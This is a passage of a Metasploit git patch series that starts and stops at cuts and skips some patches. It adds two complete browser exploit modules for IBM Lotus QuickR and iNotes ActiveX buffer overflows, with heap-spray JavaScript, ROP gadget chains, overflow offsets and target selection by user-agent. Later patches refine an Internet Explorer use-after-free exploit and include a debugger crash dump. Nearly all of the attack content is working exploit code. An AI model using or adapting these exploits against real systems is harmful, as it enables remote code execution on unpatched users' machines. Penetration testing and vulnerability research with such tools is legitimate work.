enumerating users on #{host}") From e05b55f32db2f67d2cb91698feb8b388da9b1c50 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 28 Dec 2012 03:48:35 -0600 Subject: [PATCH 094/154] Add new functions --- .../stdapi/railgun/def/def_netapi32.rb | 21 ++++++++++++++++++- 1 file changed, 20 insertions(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb index 80983e77ce..50b5ee4500 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb @@ -35,6 +35,26 @@ class Def_netapi32 ["DWORD","resume_handle","inout"] ]) + dll.add_function('NetWkstaUserEnum', 'DWORD', [ + ["PWCHAR","servername","in"], + ["DWORD","level","in"], + ["PDWORD","bufptr","out"], + ["DWORD","prefmaxlen","in"], + ["PDWORD","entriesread","out"], + ["PDWORD","totalentries","out"], + ["DWORD","resume_handle","inout"] + ]) + + dll.add_function('NetUserGetGroups', 'DWORD', [ + ["PWCHAR","servername","in"], + ["PWCHAR","username","in"], + ["DWORD","level","in"], + ["PDWORD","bufptr","out"], + ["DWORD","prefmaxlen","in"], + ["PDWORD","entriesread","out"], + ["PDWORD","totalentries","out"] + ]) + return dll end @@ -42,4 +62,3 @@ end end; end; end; end; end; end; end - From 8ea5c993a2bee724547619885ded0e64b268434c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 28 Dec 2012 11:44:30 +0100 Subject: [PATCH 095/154] added module for zdi-12-134 --- .../windows/browser/quickr_qp2_bof.rb | 269 ++++++++++++++++++ 1 file changed, 269 insertions(+) create mode 100644 modules/exploits/windows/browser/quickr_qp2_bof.rb diff --git a/modules/exploits/windows/browser/quickr_qp2_bof.rb b/modules/exploits/windows/browser/quickr_qp2_bof.rb new file mode 100644 index 0000000000..bb83cb430d --- /dev/null +++ b/modules/exploits/windows/browser/quickr_qp2_bof.rb @@ -0,0 +1,269 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb + include Msf::Exploit::Remote::BrowserAutopwn + + autopwn_info({ + :ua_name => HttpClients::IE, + :ua_minver => "6.0", + :ua_maxver => "9.0", + :javascript => true, + :os_name => OperatingSystems::WINDOWS, + :rank => Rank, + :classid => "{05D96F71-87C6-11D3-9BE4-00902742D6E0}", + :method => "Attachment_Times" + }) + + + def initialize(info={}) + super(update_info(info, + 'Name' => "IBM Lotus QuickR qp2 ActiveX Buffer Overflow", + 'Description' => %q{ + This module exploits a buffer overflow vulnerability on the UploadControl + ActiveX. The vulnerability exists in the handling of the "Attachment_Times" + property, due to the insecure usage of the _swscanf. The affected ActiveX is + provided by the qp2.dll installed with the IBM Lotus Quickr product. + + This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7, + using the qp2.dll 8.1.0.1800. In order to bypass ASLR the no aslr compatible module + msvcr71.dll is used. This one is installed with the qp2 ActiveX. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Gaurav Baruah', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-2176' ], + [ 'OSVDB', '82166' ], + [ 'BID', '53678'], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-134/' ], + [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21596191' ] + ], + 'Payload' => + { + 'Space' => 978, + 'DisableNops' => true, + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f' + }, + 'Platform' => 'win', + 'Targets' => + [ + # qp2.dll 8.1.0.1800 + [ 'Automatic', {} ], + [ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ], + [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ], + [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x7C346B52 } ], # pop esp # ret # msvcr71.dll + [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4', 'Ret' => 0x0c0c0c0c } ], + [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x7C346B52 } ], # pop esp # ret # msvcr71.dll + [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x7C346B52 } ], # pop esp # ret # msvcr71.dll + [ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5fe', 'Ret' => 0x7C346B52 } ] # pop esp # ret # msvcr71.dll + ], + 'Privileged' => false, + 'DisclosureDate' => "May 23 2012", + 'DefaultTarget' => 0)) + + register_options( + [ + OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) + ], self.class) + + end + + def get_target(agent) + #If the user is already specified by the user, we'll just use that + return target if target.name != 'Automatic' + + nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' + ie = agent.scan(/MSIE (\d)/).flatten[0] || '' + + ie_name = "IE #{ie}" + + case nt + when '5.1' + os_name = 'Windows XP SP3' + when '6.0' + os_name = 'Windows Vista' + when '6.1' + os_name = 'Windows 7' + end + + targets.each do |t| + if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) + print_status("Target selected as: #{t.name}") + return t + end + end + + return nil + end + + def ie_heap_spray(my_target, p) + js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) + js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) + js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) + + # Land the payload at 0x0c0c0c0c + case my_target + when targets[7] + # IE 9 on Windows 7 + js = %Q| + function randomblock(blocksize) + { + var theblock = ""; + for (var i = 0; i < blocksize; i++) + { + theblock += Math.floor(Math.random()*90)+10; + } + return theblock; + } + + function tounescape(block) + { + var blocklen = block.length; + var unescapestr = ""; + for (var i = 0; i < blocklen-1; i=i+4) + { + unescapestr += "%u" + block.substring(i,i+4); + } + return unescapestr; + } + + var heap_obj = new heapLib.ie(0x10000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_random_nops}"); + while (nops.length < 0x80000) nops += nops; + var offset_length = #{my_target['Offset']}; + for (var i=0; i < 0x1000; i++) { + var padding = unescape(tounescape(randomblock(0x1000))); + while (padding.length < 0x1000) padding+= padding; + var junk_offset = padding.substring(0, offset_length); + var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length); + while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock; + sprayblock = single_sprayblock.substring(0, (0x40000-6)/2); + heap_obj.alloc(sprayblock); + } + | + + else + # For IE 6, 7, 8 + js = %Q| + var heap_obj = new heapLib.ie(0x20000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_nops}"); + while (nops.length < 0x80000) nops += nops; + var offset = nops.substring(0, #{my_target['Offset']}); + var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); + while (shellcode.length < 0x40000) shellcode += shellcode; + var block = shellcode.substring(0, (0x80000-6)/2); + heap_obj.gc(); + for (var i=1; i < 0x300; i++) { + heap_obj.alloc(block); + } + var overflow = nops.substring(0, 10); + | + + end + + js = heaplib(js, {:noobfu => true}) + + if datastore['OBFUSCATE'] + js = ::Rex::Exploitation::JSObfu.new(js) + js.obfuscate + end + + return js + end + + def get_payload(t, cli) + code = payload.encoded + + # No rop. Just return the payload. + return code if t['Rop'].nil? + + # Both ROP chains generated by mona.py - See corelan.be + case t['Rop'] + when :jre + print_status("Using JRE ROP") + rop_payload = generate_rop_payload('java', code)#, {'pivot'=>stack_pivot}) + end + + return rop_payload + end + + def load_exploit_html(my_target, cli) + p = get_payload(my_target, cli) + js = ie_heap_spray(my_target, p) + + bof = rand_text_alpha(512) # offset to eip" + bof << [my_target.ret].pack("V") + if my_target['Rop'] + bof << rand_text_alpha(4) + bof << [0x0c0c0c0c].pack("V") # new stack + end + + my_bof = Rex::Text.to_unescape(bof) + + html = %Q| + + + + + + + + + + + + + | + + return html + end + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + uri = request.uri + print_status("Requesting: #{uri}") + + my_target = get_target(agent) + # Avoid the attack if no suitable target found + if my_target.nil? + print_error("Browser not supported, sending 404: #{agent}") + send_not_found(cli) + return + end + + html = load_exploit_html(my_target, cli) + html = html.gsub(/^\t\t/, '') + print_status("Sending HTML...") + send_response(cli, html, {'Content-Type'=>'text/html'}) + end + +end \ No newline at end of file From af61438b0b47b8da2a1414dc997d7666466ffb4d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 28 Dec 2012 11:45:32 +0100 Subject: [PATCH 096/154] added module for zdi-12-132 --- .../windows/browser/inotes_dwa85w_bof.rb | 292 ++++++++++++++++++ 1 file changed, 292 insertions(+) create mode 100644 modules/exploits/windows/browser/inotes_dwa85w_bof.rb diff --git a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb new file mode 100644 index 0000000000..96e6dd2308 --- /dev/null +++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb @@ -0,0 +1,292 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb + include Msf::Exploit::Remote::BrowserAutopwn + + autopwn_info({ + :ua_name => HttpClients::IE, + :ua_minver => "6.0", + :ua_maxver => "9.0", + :javascript => true, + :os_name => OperatingSystems::WINDOWS, + :rank => Rank, + :classid => "{0F2AAAE3-7E9E-4b64-AB5D-1CA24C6ACB9C}", + :method => "Attachment_Times" + }) + + + def initialize(info={}) + super(update_info(info, + 'Name' => "IBM Lotus iNotes dwa85W ActiveX Buffer Overflow", + 'Description' => %q{ + This module exploits a buffer overflow vulnerability on the UploadControl + ActiveX. The vulnerability exists in the handling of the "Attachment_Times" + property, due to the insecure usage of the _swscanf. The affected ActiveX is + provided by the dwa85W.dll installed with the IBM Lotus iNotes ActiveX installer. + + This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7, + using the dwa85W.dll 85.3.3.0 as installed with Lotus Domino 8.5.3. + + In order to bypass ASLR the no aslr compatible module dwabho.dll is used. This one + is installed with the iNotes ActiveX. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Gaurav Baruah', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-2175'], + [ 'OSVDB', '82755' ], + [ 'BID', '53879' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-132/' ], + [ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21596862' ] + ], + 'Payload' => + { + 'Space' => 978, + 'DisableNops' => true, + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f' + }, + 'Platform' => 'win', + 'Targets' => + [ + # dwa85W.dll 85.3.3.0 + [ 'Automatic', {} ], + [ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ], + [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ], + [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Ret' => 0x77C34FBF } ], # pop esp # ret # msvcrt.dll + [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4', 'Ret' => 0x0c0c0c0c } ], + [ 'IE 8 on Windows Vista', { 'Rop' => :notes, 'Offset' => '0x5f4', 'Ret' => 0x1000f765 } ], # pop eax # ret # dwabho.dll + [ 'IE 8 on Windows 7', { 'Rop' => :notes, 'Offset' => '0x5f4', 'Ret' => 0x1000f765 } ], # pop eax # ret # dwabho.dll + [ 'IE 9 on Windows 7', { 'Rop' => :notes, 'Offset' => '0x5fe', 'Ret' => 0x1000f765 } ] # pop eax # ret # dwabho.dll + ], + 'Privileged' => false, + 'DisclosureDate' => "Jun 01 2012", + 'DefaultTarget' => 0)) + + register_options( + [ + OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) + ], self.class) + + end + + def get_target(agent) + #If the user is already specified by the user, we'll just use that + return target if target.name != 'Automatic' + + nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' + ie = agent.scan(/MSIE (\d)/).flatten[0] || '' + + ie_name = "IE #{ie}" + + case nt + when '5.1' + os_name = 'Windows XP SP3' + when '6.0' + os_name = 'Windows Vista' + when '6.1' + os_name = 'Windows 7' + end + + targets.each do |t| + if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) + print_status("Target selected as: #{t.name}") + return t + end + end + + return nil + end + + def ie_heap_spray(my_target, p) + js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) + js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) + js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) + + # Land the payload at 0x0c0c0c0c + case my_target + when targets[7] + # IE 9 on Windows 7 + js = %Q| + function randomblock(blocksize) + { + var theblock = ""; + for (var i = 0; i < blocksize; i++) + { + theblock += Math.floor(Math.random()*90)+10; + } + return theblock; + } + + function tounescape(block) + { + var blocklen = block.length; + var unescapestr = ""; + for (var i = 0; i < blocklen-1; i=i+4) + { + unescapestr += "%u" + block.substring(i,i+4); + } + return unescapestr; + } + + var heap_obj = new heapLib.ie(0x10000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_random_nops}"); + while (nops.length < 0x80000) nops += nops; + var offset_length = #{my_target['Offset']}; + for (var i=0; i < 0x1000; i++) { + var padding = unescape(tounescape(randomblock(0x1000))); + while (padding.length < 0x1000) padding+= padding; + var junk_offset = padding.substring(0, offset_length); + var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length); + while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock; + sprayblock = single_sprayblock.substring(0, (0x40000-6)/2); + heap_obj.alloc(sprayblock); + } + | + + else + # For IE 6, 7, 8 + js = %Q| + var heap_obj = new heapLib.ie(0x20000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_nops}"); + while (nops.length < 0x80000) nops += nops; + var offset = nops.substring(0, #{my_target['Offset']}); + var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); + while (shellcode.length < 0x40000) shellcode += shellcode; + var block = shellcode.substring(0, (0x80000-6)/2); + heap_obj.gc(); + for (var i=1; i < 0x300; i++) { + heap_obj.alloc(block); + } + var overflow = nops.substring(0, 10); + | + + end + + js = heaplib(js, {:noobfu => true}) + + if datastore['OBFUSCATE'] + js = ::Rex::Exploitation::JSObfu.new(js) + js.obfuscate + end + + return js + end + + def get_payload(t, cli) + code = payload.encoded + + # No rop. Just return the payload. + return code if t['Rop'].nil? + + # Both ROP chains generated by mona.py - See corelan.be + case t['Rop'] + when :msvcrt + print_status("Using msvcrt ROP") + rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})#{'pivot'=>stack_pivot, 'target'=>'xp'}) + else + print_status("Using dwabho.dll ROP") + # gadgets from dwabho.dll, using mona.py + rop_payload = [ + 0x1000f765, # POP EAX # RETN + 0x1001a22c, # ptr to &VirtualAlloc() [IAT dwabho.dll] + 0x10010394, # JMP DWORD PTR DS:[EAX] + 0x0c0c0c2c, # ret after VirtualAlloc + 0x0c0c0c2c, # lpAddress + 0x00000400, # dwSize + 0x00001000, # flAllocationType + 0x00000040 # flProtect + ].pack("V*") + rop_payload << code + end + + return rop_payload + end + + def load_exploit_html(my_target, cli) + p = get_payload(my_target, cli) + js = ie_heap_spray(my_target, p) + + bof = rand_text_alpha(552) # offset to eip + bof << [my_target.ret].pack("V") + + case my_target['Rop'] + when :msvcrt + bof << rand_text_alpha(4) + bof << [0x0c0c0c0c].pack("V") # new ESP + when :notes + bof << rand_text_alpha(4) + bof << [0x0c0c0c00].pack("V") # eax + bof << [0x1000f49a].pack("V") # pop esp # dec ecx # add byte ptr ds:[eax],al # pop ecx # pop ecx # retn # dwabho.dll + bof << [0x0c0c0c04].pack("V") # new ESP + end + + my_bof = Rex::Text.to_unescape(bof) + + html = %Q| + + + + + + + + + + + + + | + + return html + end + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + uri = request.uri + print_status("Requesting: #{uri}") + + my_target = get_target(agent) + # Avoid the attack if no suitable target found + if my_target.nil? + print_error("Browser not supported, sending 404: #{agent}") + send_not_found(cli) + return + end + + html = load_exploit_html(my_target, cli) + html = html.gsub(/^\t\t/, '') + print_status("Sending HTML...") + send_response(cli, html, {'Content-Type'=>'text/html'}) + end + +end \ No newline at end of file From 8f62cd5561aa69876ecfeab8bba4c0abdc98a384 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 28 Dec 2012 12:47:20 +0100 Subject: [PATCH 097/154] swith to some random data --- modules/exploits/windows/browser/inotes_dwa85w_bof.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb index 96e6dd2308..da2353bda9 100644 --- a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb +++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb @@ -254,11 +254,11 @@ class Metasploit3 < Msf::Exploit::Remote - + + + +
+
+ + + + + | + + return html + end + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + uri = request.uri + print_status("Requesting: #{uri}") + + my_target = get_target(agent) + # Avoid the attack if no suitable target found + if my_target.nil? + print_error("Browser not supported, sending 404: #{agent}") + send_not_found(cli) + return + end + + html = load_exploit_html(my_target, cli) + html = html.gsub(/^\t\t/, '') + print_status("Sending HTML...") + send_response(cli, html, {'Content-Type'=>'text/html'}) + end + +end + + +=begin +(87c.f40): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400 +eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 +mshtml!CMarkup::OnLoadStatusDone+0x504: +637848c3 ff90dc000000 call dword ptr +0xdb (000000dc)[eax] ds:0023:12120de8=???????? +0:008> k +ChildEBP RetAddr +020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504 +020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47 +020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f +020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12 +020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb +020bfd78 7e418734 mshtml!GlobalWndProc+0x183 +020bfda4 7e418816 USER32!InternalCallWinProc+0x28 +020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150 +020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306 +020bfe7c 01252ec9 USER32!DispatchMessageW+0xf +020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461 +020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1 +020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab +020bffec 00000000 kernel32!BaseThreadStart+0x37 + +0:008> r +eax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120 +eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 +mshtml!CMarkup::OnLoadStatusDone+0x504: +637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=???????? + +=end \ No newline at end of file From 14d197eeb2ad5a8b1a09a7885b4aaa9935029ab9 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sun, 30 Dec 2012 11:35:29 +0100 Subject: [PATCH 104/154] Added Windows Server 2003 --- modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb index 2d716775eb..0a18d93c17 100644 --- a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb +++ b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb @@ -56,9 +56,10 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ [ 'Automatic', {} ], - [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 - [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 - [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 + [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 + [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 + [ 'IE 8 on Windows Server 2003', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 + [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 ], 'Privileged' => false, 'DisclosureDate' => "Dec 27 2012", @@ -83,6 +84,8 @@ class Metasploit3 < Msf::Exploit::Remote case nt when '5.1' os_name = 'Windows XP SP3' + when '5.2' + os_name = 'Windows Server 2003' when '6.0' os_name = 'Windows Vista' when '6.1' From dcf018c339835c97156f7a726045d7dafef55698 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sun, 30 Dec 2012 12:54:44 +0100 Subject: [PATCH 105/154] Comma --- modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb index 0a18d93c17..08a226a2d7 100644 --- a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb +++ b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 [ 'IE 8 on Windows Server 2003', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 - [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 + [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30 ], 'Privileged' => false, 'DisclosureDate' => "Dec 27 2012", From cab84b5c27012ec0e3bdc33369e775806067f758 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sun, 30 Dec 2012 13:02:13 +0100 Subject: [PATCH 106/154] Fix for issue #1219 --- modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb index 08a226a2d7..d31e84edf9 100644 --- a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb +++ b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb @@ -90,6 +90,9 @@ class Metasploit3 < Msf::Exploit::Remote os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' + else + # OS not supported + return nil end targets.each do |t| From cd58cc73d97c7b18f3a083517b83e1080c654ea7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 30 Dec 2012 13:12:55 +0100 Subject: [PATCH 107/154] fixed rop chain for w2003 --- .../windows/browser/ie_cdwnbindinfo_uaf.rb | 22 +++++++++++-------- 1 file changed, 13 insertions(+), 9 deletions(-) diff --git a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb index d31e84edf9..6ac7ad47d7 100644 --- a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb +++ b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb @@ -58,8 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Automatic', {} ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 - [ 'IE 8 on Windows Server 2003', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 - [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30 + [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 + [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 ], 'Privileged' => false, 'DisclosureDate' => "Dec 27 2012", @@ -90,9 +90,6 @@ class Metasploit3 < Msf::Exploit::Remote os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' - else - # OS not supported - return nil end targets.each do |t| @@ -152,10 +149,17 @@ Stack Pivoting to eax: case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") - stack_pivot = [0x77c15ed6].pack("V") * 54 # ret - stack_pivot << [0x77c2362c].pack("V") # pop ebx, #ret - stack_pivot << [0x77c15ed5].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c - rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'}) + if t['Name'] =~ /Windows XP/ + stack_pivot = [0x77c15ed6].pack("V") * 54 # ret + stack_pivot << [0x77c2362c].pack("V") # pop ebx, #ret + stack_pivot << [0x77c15ed5].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c + rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'}) + else + stack_pivot = [0x77bcba5f].pack("V") * 54 # ret + stack_pivot << [0x77bb4158].pack("V") # pop ebx, #ret + stack_pivot << [0x77bcba5e].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c + rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'}) + end else print_status("Using JRE ROP") stack_pivot = [0x7c348b06].pack("V") * 54 # ret From 6be8ed616873dad64b09504aca1454fc599e125c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 30 Dec 2012 13:25:42 +0100 Subject: [PATCH 108/154] readd fix for #1219 --- modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb index 6ac7ad47d7..20847e88ae 100644 --- a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb +++ b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb @@ -90,6 +90,9 @@ class Metasploit3 < Msf::Exploit::Remote os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' + else + # OS not supported + return nil end targets.each do |t| From f7d6594314bc9d55715b2809aa3f26997bd56e39 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sun, 30 Dec 2012 13:39:14 +0100 Subject: [PATCH 109/154] re-deleted comma --- modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb index 20847e88ae..ec3602bcc7 100644 --- a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb +++ b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 